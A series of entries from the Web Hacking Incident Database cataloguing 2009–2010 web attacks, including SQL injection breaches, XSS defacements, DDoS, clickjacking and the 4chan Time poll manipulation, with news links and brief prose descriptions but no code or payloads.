Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A Lebanese hacker is taking credit for a security breach on the PEO Soldier Army website. By exploiting an SQL injection vulnerability, he allegedly obtained full access to the underlying database and the information contained within.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/U-S-Military-Equipment-Website-Hacked-131947.shtml
Attack Source Geography: Lebanon
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-10: FBI, police ID Boulder synagogue Web site hacker
WHID ID: 2010-10
Date Occured: 1/2/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Religious
Attacked Entity Geography: Boulder, CO
Incident Description: Boulder police and the FBI announced Friday that they have identified the individual who hacked into the Web sites of two Boulder synagogues and the Boulder Rabbinic Council last week and defaced them with anti-Semitic messages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dailycamera.com/ci_14150610?source=most_emailed#axzz0ieLUTxxC
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-9: Pakistani cyber crime website hit by hacker who is able to access database
WHID ID: 2010-9
Date Occured: 1/11/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Pakistan
Incident Description: Details of a political website, the Pakistani National Response Center for Cyber Crimes, part of the Federal Investigation Authority, being hacked has been reported when a sensitive site was hit by a hacker who managed to gain access to the email database.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/pakistani-cyber-crime-website-hit-by-hacker-who-is-able-to-access-database/article/160969/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-8: Cross-site scripting vulnerabilities see two political websites hacked
WHID ID: 2010-8
Date Occured: 1/5/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Spain
Incident Description: A report on BBC News said that visitors to Spain's EU presidency website were greeted by an image of comedy character Mr Bean instead of the Spanish Prime Minister Jose Luis Rodriguez Zapatero. The government said that the site - www.eu2010.es - had not been attacked and that a hacker had taken a screenshot of the homepage to make a photo montage using a cross-site scripting (XSS) vulnerability. Visitors found an image of Mr Bean complete with a benign smile and the words ‘Hi there'.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/cross-site-scripting-vulnerabilities-see-two-political-websites-hacked/article/160597/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-7: Hacker attacks Ceridian; data from 27,000 at risk
WHID ID: 2010-7
Date Occured: 1/20/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Minnesota, USA
Incident Description: A hacker attack at payroll processing firm Ceridian Corp. of Bloomington has potentially revealed the names, Social Security numbers, and, in some cases, the birth dates and bank accounts of 27,000 employees working at 1,900 companies nationwide. The attack was against the Powerpay payroll system.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.startribune.com/business/83505102.html?elr=KArksUUUU
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 27000
Additional Link:
Entry Title: WHID 2010-6: Cyber hacker hits Paula Dockery's campaign site
WHID ID: 2010-6
Date Occured: 1/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Florida, USA
Incident Description: Attacker(s) conducted a DDoS attack against the Florida Candidate for Governor Paula Dockery's website. In essence, what is happening is someone is sending approximately 40,000 requests per second to the website/server, then immediately closing them… It is the equivalent of 2.4 million people a minute browsing to the site and closing it immediately. In essence this saturates the number of connections available to legitimate people trying to get to the server, causing them to time-out when they visit the site. In security terms it is called a Denial of Service Attack (DoS).
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.tampabay.com/buzz/2010/01/cyber-hacker-hits-paula-dockerys-campaign-site.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-5: City of Albertville's web site hacked
WHID ID: 2010-5
Date Occured: 3/18/2010
Attack Method: Unknown
Application Weakness:
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Alabama, USA
Incident Description: The website of the Mayor of Albertsville, AL was defaced with profanity.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.waff.com/Global/story.asp?S=12166330
Attack Source Geography: Alabama, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-4: Shopping website hacked with malware
WHID ID: 2010-4
Date Occured: 3/19/2010
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: Australia
Incident Description: Australian retailer DealsDirect.com.au started serving malware to clients through a compromised partner advertising system. It seems that end users were made aware of malware due to Google Safe Browsing plugins in Google Chrome, Firefox and Internet Explorer browsers as they were alerted with the "This site may harm your computer" warning. It is a shame that web sites themselves aren't doing better at analyzing outbound data they are serving to ensure that it is not malicious.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.ninemsn.com.au/technology/1029568/shopping-website-hacked-with-malware
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-3: Feds Crack Hackers' Stock Manipulation Cybercrime
WHID ID: 2010-3
Date Occured: 3/16/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description: Hackers, working for BroCo Investments (a one-trader operation based in St. Petersburg, Russia) used stolen online brokerage credentials to initiate a pump-and-dump scheme. Within minutes of making the unauthorized transactions, the SEC claims BroCo then sold shares of these same stocks held in its own account at the artificially inflated prices, netting the hackers more than $250,000 in profits. From a defensive perspective, the online brokerage accounts should be doing more to authenticate users and validate transactions. The challenging part is that these types of defensive mechanisms may actually interfere with many of the automated bot programs that investors use to monitor and execute trades. Online trading fraud is not going to go away anytime soon. Read More on SEC filing - http://www.wired.com/images_blogs/threatlevel/2010/03/brocosec.pdf
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.esecurityplanet.com/news/article.php/3871176/Feds-Crack-Hackers-Stock-Manipulation-Cybercrime.htm
Attack Source Geography: St. Petersburg, Russia
Attacked System Technology:
Cost: $600000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-2: Hacker Disables More Than 100 Cars Remotely
WHID ID: 2010-2
Date Occured: 3/17/2010
Attack Method: Administration Error
Application Weakness: Insufficient Authorization
Outcome: Data Loss
Attacked Entity Field: Automotive
Attacked Entity Geography: Austin TX, USA
Incident Description: Hundreds of cars would not start and/or had their horn honking when a former employee at Texas Auto Center used previous passwords to log into a system called Webtech Plus whic is used as an alternative to repossessing vehicles that haven’t been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car’s ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The hacker destroyed account records and then started to disable cars/force the horn to honk continuously. Read More http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/#ixzz0iYvPwUVj
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/
Attack Source Geography: Texas, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-1: Hacker Breaks Into 49 House Sites, Insults Obama
WHID ID: 2010-1
Date Occured: 2/1/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A hacker broke into 49 House Web sites of both political parties after President Obama's State of the Union address. The websites were all managed by a private vendor -- GovTrends of Alexandria, Va. The article mentions that "GovTrends let its guard down while performing an update, allowing the hacker to penetrate sites of individual members and committees overnight" which leads to WHID's Misconfiguration Attack Method designation. Interesting note - 18 House sites managed by GovTrends were defaced last August.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.toptechnews.com/news/Hacker-Breaks-Into-49-House-Sites/story.xhtml?story_id=00100041BAO7
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-51: Hacker Hits RBS WorldPay Systems Database
WHID ID: 2009-51
Date Occured: 9/11/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Georgia, USA
Incident Description: A Romanian hacker well-known for discovering SQL injection vulnerabilities in high-profile Websites has struck again -- this time on RBS WorldPay's site, where he says he hit the jackpot, the company's database. The hacker, who goes by "Unu," says he accessed RBS WorldPay's database via a SQL injection flaw in one of its Web applications. RBS WorldPay maintains Unu accessed a test database that didn't carry any live data, and that no merchant or cardholder data accounts were compromised. The company has since taken down the pages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.darkreading.com/database_security/security/app-security/showArticle.jhtml?articleID=220000005
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-50: Iranian hacker attack: What will it cost Twitter?
WHID ID: 2009-50
Date Occured: 12/17/2009
Attack Method: DNS Hijacking
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: A new attack by hackers Dec. 17 redirected Twitter users to a page from a previously unknown group called the Iranian Cyber Army. Most computer attacks are relatively straightforward denial-of-service attacks, where computers overwhelm a website with data to bring it down. Thursday night's attack against Twitter was more serious because the hackers gained access to part of Twitter's network and were able to redirect users to a page with a photo of a flag with Farsi script. Near the top of the page ran a bold red headline in English: "This site has been hacked by Iranian Cyber Army." Hackers for several days have attacked the websites of opponents of Iran's regime and posted the same image. The opponents have used social-media sites like Twitter to organize street protests this year.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.csmonitor.com/Money/2009/1218/Iranian-hacker-attack-What-will-it-cost-Twitter
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-49: RockYou Hack: From Bad To Worse
WHID ID: 2009-49
Date Occured: 12/14/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Earlier today news spread that social application site RockYou had suffered a data breached that resulted in the exposure of over 32 Million user accounts. To compound the severity of the security breach, it was found that RockYou are storing all user account data in plain text in their database, exposing all that information to attackers. RockYou have yet to inform users of the breach, and their blog is eerily silent – but the details of the security breach are going from bad to worse.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-48: XSS Embedded iFrames
WHID ID: 2009-48
Date Occured: 12/14/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://research.zscaler.com/2009/12/xss-embedded-iframes.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-47: Morrison says 'new baby' story a hoax by web hacker
WHID ID: 2009-47
Date Occured: 12/29/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: A hoax, posted by a hacker on Van Morrison's website, falsely claimed the singer (64) had a baby with a woman called Gigi Lee. But the reclusive singer issued a statement on New Year's Eve saying he is happily married to former model Michelle Rocca. The earlier reports were carried by news organisations worldwide after a Los Angeles based public relations consultant, who has represented Morrison in the past, apparently confirmed the claim on Tuesday. However, the statement issued by Van Morrison said: "I have asked my management team to carry out an immediate investigation into a hacking attack which took place on my website on December 29th last. "This is the second occasion on which the website has been hacked into during the last three months. In this most recent incident, claims were made relating to my personal life in a "statement'' purporting to come from me.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.independent.ie/national-news/morrison-says-new-baby-story-a-hoax-by-web-hacker-1996333.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-46: Clickjacking Attack Hit Facebook
WHID ID: 2009-46
Date Occured: 12/23/2009
Attack Method: Clickjacking
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: The Facebook clickjacking assault appeared as a comment posted to the account of a user along with a photograph, which enticed him to hit it. On clicking the link, it led the user to a web-page, which pretended to be a CAPTCHA test. It also prompted him to hit a blue colored button namely "Share" embedded in the Facebook web-page. But on clicking it, the victim was diverted to a YouTube video appeared on his Facebook account. Consequently, the victim and his contacts were infected. Krzysztof Kotowicz, a freelance security researcher, states that presently the attack is effective merely in Chrome and Firefox Web-browsers, as reported by Help Net Security on December 22, 2009.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.spamfighter.com/News-13684-Clickjacking-Attack-Hit-Facebook.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-45: Vaserv Hacked and Owner Commits Suicide Over Data Loss
WHID ID: 2009-45
Date Occured: 6/10/2009
Attack Method: Various
Application Weakness: Unknown
Outcome: Data Loss
Attacked Entity Field: Service Providers
Attacked Entity Geography:
Incident Description:

This must be the worse incident reported by the Web Hacking Incident Database.

We all know that web security is highly important but neglected. We tell frightening stories but listners think they are only "FUD": fear, uncertainty and doubt, used to sell products and services. I hope that the VAServ incident will serve to warn that those are not fairytale stories. Even so, I wish this one would not have happened.

In this story, like most calamities, it seems that the laymen suffer: small entrepreneurs & upstart companies who lost everything in a hacking incident. One of them even lost his life.

Vaserv web site reporting recovery status, June 10th:
22:19 vz47uk restored
22:21 vz46uk data loss
22:42 Please allow upto 2 hours for a ticket response as currently we have 200+ active tickets
23:02 vz67uk data loss
23:20 vz50uk data restored
23:23 vz51uk data loss
00:03 FsckVPS server26 and server27 are still being worked on, but data *appears* to be intact

It all started on Sunday, June 7th: someone broke into the web servers of VAServ, a tiny UK based hosting company. The hackers ruined many of VAServ virtual servers. Some of them lost were for ever as the snippet from VAServ home page, serving as an emergency bulletin board, shows.

As tiny as VAServ is, probably no more than 3 people, in today's virtual and flat world they could serve tens of thousands of low cost web sites, many of them now lost for ever. Behind each one of these web sites there is a story of someone who worked hard, whether on a hobby or a small business and is now left with nothing. A comment made on one of the blog entries about the incident reads:

"yeah thanks for ruining my life for the last 2 years i had built up my site spending alot of money and giving up my job for nothing.........what am i going to tell the wife?"

Just think about tens of thousand of such stories. Daniel Voyce, a web developer using VAServ for all of his clients, told the Register:

"Since last night, I've had probably 40 phone calls from clients saying 'Why is my website down, It's making me look bad."

But this domino effect ruining so many small businesses had another even more devastating angle. Just days before the hack, someone posted on milw0rm a long list of yet unpatched vulnerabilities in Kloxo, a virtual machine management software. The list certainly looks comprehensive enough to enable anyone to penetrate a site using Kloxo, which VAServ where, leading VAServ and others to believe that LxLabs, the Bangalorian software company behind Kloxo is the culprit. Somebody claiming to be the hacker commented to the inquistir blog, claiming that weak password at VAServ where to blame for the hack, which Rus Foster from VAServ denied.

We may never know who is right and who is wrong. LxLabs, just like Vaserv, is a tiny company using the Internet to look big. However one area that suffers a lot in small companies, is their security. It is never important enough to invest resource in security in such a lean and mean operations.

But tiny giants have another weakness: it all falls on the shoulders of too few people. In the case of LxLabs, on KT Ligesh the CEO. Ligesh committed suicide just a day after the hack for which his company was blamed. While already a troubled person, one cannot escape the thought that the hacking incident was the last straw.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.inquisitr.com/25617/update-new-information-on-the-vaserv-hack-that-wiped-100k-sites/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-43: Web Mail Company to Pay Prize After CEO Hacked
WHID ID: 2009-43
Date Occured: 6/10/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description: What does a challenge to break an web mail system and get $10,000, broken within minutes prove? Is it a lesson in vanity? Or about the state of web security? Or about security in general. Probably all. The most obvious observatoins is that offering $10,000 for anyone who can break your site and being broken within an hour shows that you don't know what you taking about. Maybe it would be a lesson to all security vendors to not believe their own marketing verbiage. A quick browse of the bugtraq vulnerability archives will show how insecure and easy to evade security products can be. However, judging from the number and seriousness of the incidents reported on the web hacking incidents database, StrongWebmail is not alone and far stronger companies suffers severe incidents, making web applications the weakest link in an organizations information security. Lastly, we should always remember that there is never perfect security. By making systems more secure we are just raising the price required to attack them and lowering the damage of such an attack, but never. As the old joke goes: the only secure system is one without users.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.strongwebmail.com/secure/email/contests/hack/tc
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-42: Puerto Rico sites redirected in a DNS attack
WHID ID: 2009-42
Date Occured: 4/27/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography: US
Incident Description: Attacking web sites by going to the source, targeting DNS servers rather than the web sites themselves shows both the boldness of hackers as well as the fragility of the Internet. While not new, DNS hijacking attacks took an important turn this year showing how much we rely on the web and now little we care for its protection. In the past DNS hijacking required complete control over the DNS server. In recent years most applications are controlled through a web interface, including DNS servers. Earlier this year attackers found an XSS vulnerability in a common DNS platform to hijack unused DNS entries for phishing But this was only a small prelude to the real thing. CNet reports that this time hackers took over an entire TLD (Top Level Domain, or country) DNS server using SQL injection, virtually defacing the Puerto Rican site of companies such as Google and Microsoft. The amazing story unfolds in the comments to CNet story, which outlines a mischievous professor and slow authorities who let him privatize and monetize on domain registration in Puerto Rico without any control. The question we are left with is whether other countries and geographies different? Or even other industries for that matter?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-1009_3-10228436-83.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-41: Malware in Advertizing at Digital Spy
WHID ID: 2009-41
Date Occured: 6/2/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description: The register reports that Digital Spy, a high profile UK gossip site carried banner inflicting ads. Digital Spy has acknowledged the issue and said it promptly addressed it, however details on the source of the malicious banners is still not availalbe. Malware distribution through ad programs is a borderline phenomenon. While there is no question that malware distribucion is malicious, and in most geographies illegal, in many cases the site owners are not technically responsible for the content of the ads they serve as the ad content comes directly from a 3rd party. The question whether they are legally responsible is open. Another issue is defining a malware. Many times ads are used to entice users to download and install programs that are questionable. a rootkit installed through a known browser vulnerability is a malware, however the distinction between adware and malware is many time blurred and depends on: The ratio between benefit to the user and benefit to the software distributor, The clarity in which the benefit to the software distributor is explained to the user, and lastly: The legality of this benefit
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2009/06/02/digital_spy_malware/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-40: SQL injection Hits Sensitive US Army servers
WHID ID: 2009-40
Date Occured: 1/26/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Information Week reports that a well known Turkish hacker penetrated two sensitive US army servers, one at McAlester Ammunition Plant in McAlester, Okla., and the other at the U.S. Army Corps of Engineers' Transatlantic Center in Winchester, Va. The hacks are the currently under criminal investigation by Defense Department officials. The breaches where not publicly disclosed and the level of exposure is therefore not known. It is known however that web site visitors where redirected to a site protesting against climate change. The Register speculates that the attack method was SQL injection.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/government/federal/showArticle.jhtml?articleID=217700619
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-39: Uno is back: 245,000 records stolen from Orange France using SQL injection
WHID ID: 2009-39
Date Occured: 5/26/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: France
Incident Description: After focusing earlier this year on Anti-Virus vendors, Uno, the Romanian Hacker is now back and reports in his blog that an Orange France web site dedicated to photo management is vulnerable to SQL injection and that he was able to access 245,000 records from the web site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hackersblog.org/2009/05/25/orange-is-so-cool/
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 245000
Additional Link:
Entry Title: WHID 2009-38: Time's Poll For Most Influencial Hacked
WHID ID: 2009-38
Date Occured: 4/15/2009
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Polls are easy target for automation abuse. You can usually participate anonymously and the poll operator has an interest in drawing as many participants as possible, but as demonstrated by previous incidents such loose security enables hackers to distort the results.

This time a hacker succeeded in manipulating Time's poll for most influential people in 2009.

Top results for the hacked Time poll

Such poll are probably always distorted by automated programs,  with every stakeholder running his own robot to promote a cause. The current time poll status Shawn above includes mostly known people, though the standings do seem skewed. Is it just that our view of the world is different than others, or have Muslims around the world become avid Time readers? The top rated person, "moot", which none of you heard about until now, proves that it is all about automation.

This specific poll distortion reported by Paul Lamere is unique since a group of hackers called 4chan, led by "moot", took the time to fight Time's humble attempts to mitigate automation. Among the measures and countermeasures that 4chan and Time exchanged are:

  • 4chan distributed the simple get URL required to vote for moot through legitimate web sites and comment spamming. Such a link can easily be executed automatically by a web site user without his awareness using CSRF techniques.
  • Using a typical CSRF counter measure, Time added a salted and hashed key to ensure that the poll was submitted from its own poll form. However the key was authentication on the client by Time's poll Flash application enabling 4chan to easily find it out and overcome the issue.
  • The Time voting mechanism did not even check that the ranking in the vote was legal, so a link to vote down "moot" competitors in the list was also used until Time fixed the issue. Voting down is key to winning such a poll as 4chan competitors are not at rest running their own sophisticated campaigns.
  • Lastly 4chan developed sophisticated robots to auto-vote. Those robots overcome Time's anti-automation protections: since each user is allowed to vote just once in every 13 seconds, the robots uses open proxies to vote faster. Since time only prevents voting for the same person from the same IP, the robots used the extra 12 seconds available for each source IP to vote down competitors. The system also reports to a central server allowing monitoring of the voting rate!

Rate of voting for "rain" as recorded by 4chan monitoring

However this specific hack is ever more interesting. At one point 4chan where bored with just running moot for presidency, so they decided to use their sophisticated machine to do a more elaborate work. They decided to fix all first 21 nominees so that their initials would spell "Marblecake Also the Game". And as Paul Lamere's screenshot proves, they made it.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2009/04/17/time_top_100_hack/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-37: Twitter XSS/CSRF worm series (Updated)
WHID ID: 2009-37
Date Occured: 4/11/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

Update (Apr 19th 2009) - The initial Mooney Twitter worm has evolved into a series of 5 worms at the time of writing, each exploiting a different vulnerability in Twitter. The latest one specifically focuses on twitter accounts who have a high number of followers thus targeting celebrities such as Ashton Kutcher and Oprah Winfrey according to Graham Cluley from Sophos.

The hack seems to have paid of to Mikeyy Mooney who was hired to as security consultant following the incident.


Twitter is in the spotlights again. Mikeyy Mooney, the 17-year-old creator of StalkDaily.com, a Twitter alternative, admitted to hacking his giant competitor by implementing a worm that propagated itself through twitter making every affected user tweet about StalkDaily. Mikeyy certainly got the advertising and page views he was looking for.

Mikeyy Mooney, the Twitter worms creatorMikeyy's worm is a good example of how CSRF and XSS can be combined to create a strong blended attack, in this case a propagating worm. A Web 2.0 community generated site such as twitter is often vulnerable to stored XSS . This often implies that a user can update his own profile with malicious code and as a result others who view his content get hit. Without any other vulnerability to complicate things, you are safe as long as your friends are trustworthy.

However, if the site is also vulnerable to CSRF, the XSS exploit can include in addition to the payload also the original XSS inflicting code run under the attacked users credential, modifying his content and therefore hiting his own friends, which hit their own friends and so on.

You can find the technical details of the attack on Damon Cortesi's blog. You may also be interested in the full XSS payload.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-36: Hackers steal Austalian and NZ Shell customer info (Updated)
WHID ID: 2009-36
Date Occured: 2/17/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description:

Update (Apr 19th 2009) - (Presumably) the hacker posted a comment to this story with some details. He says that the Number_of_Records leaking was much higher: 17,000 Aussies and 7,000 Kiwis. The rest we did not understand and hope that either he or any of you can clarify.

Read more...


Leakage of information from an energy company is usually associated with gas stations fraud such as installing a stealth credit card reader at the pump. However, a report suggests that an incident in which information about 4500 Australian and 1400 Kiwis leaked was a result of a glitch in a web based application for applying for a Shell fuel card. The information obtained included company names, address details, email addresses and some bank account details.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.stuff.co.nz/national/2269256/Hackers-steal-Shell-customer-info
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 5900
Additional Link:
Entry Title: WHID 2009-35: Former US Senator Donors Information Leaks
WHID ID: 2009-35
Date Occured: 3/11/2009
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

Norm Coleman, a former senator from Minnesota, is going through a legal battle to try to win back his seat in the senate. If the way he manages his web site security and the crises it created are an indicator, I am not sure that he has a place there.

The Coleman team called in the US Secret Service to investigate the leak in which sensitive information about more than 4700 donors was published on Wikileaks, a web site devoted to such exposures. Coleman himself called the incident "an obviously an attack on my campaign".

However the Minnesota Independent reveals that the information was exposed for anyone to view on the senator's web site since at least January 28th. Hardly an attack. At the time the site was suffering performance issues and in a debate about the cause somebody commented to an Independent about the an exposed database, which the Independent was fast to report on. Moreover, Wikileaks took the trouble to inform the people in the list that their information leaked, while it took the Senator team over a month to react.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://minnesotaindependent.com/28711/breaking-colemans-unsecured-donorbase-to-be-revealed-on-wikileaks
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 4700
Additional Link:
Entry Title: WHID 2009-34: Romanian Hacker Moves On To The Telegraph
WHID ID: 2009-34
Date Occured: 3/6/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

Another week, another hack by the HackerBlog, and when it targets an important web site and the impact is severe it is worthy of WHID. This time the Romanian hacker used blind SQL injection to penetrate to the web site of the Telegraph, a leading English daily paper.

Among his findings is a table including 700,000 e-mails, which would be a gold mine for spammers.

The Telegraph response was published on their official blog.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hackersblog.org/2009/03/06/telegraphcouk-hacked-sql-injection/
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-33: eBay Fraud Abuses Zero Day XSS
WHID ID: 2009-33
Date Occured: 3/4/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

A zero day XSS vector enables hackers to include in an eBay offer an arbitrary code which is executed by both FireFox and IE. As a result they were able to spoof the content of the offer, so that the user saw different information than the details known to eBay.

A very detailed technical explanation of the vulnerability is included in a FireFox community discussions on whether the issue is a browser or a web site issue. As usual, the truth is somewhere in the middle. The FireFox team selected to correct the issue discovered in FireFox. Microsoft claimed that the issue exploited in IE, which is reported to be a CSS expression issue, is not feature and not a bug and the vulnerable web site should be fixed.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=481558
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
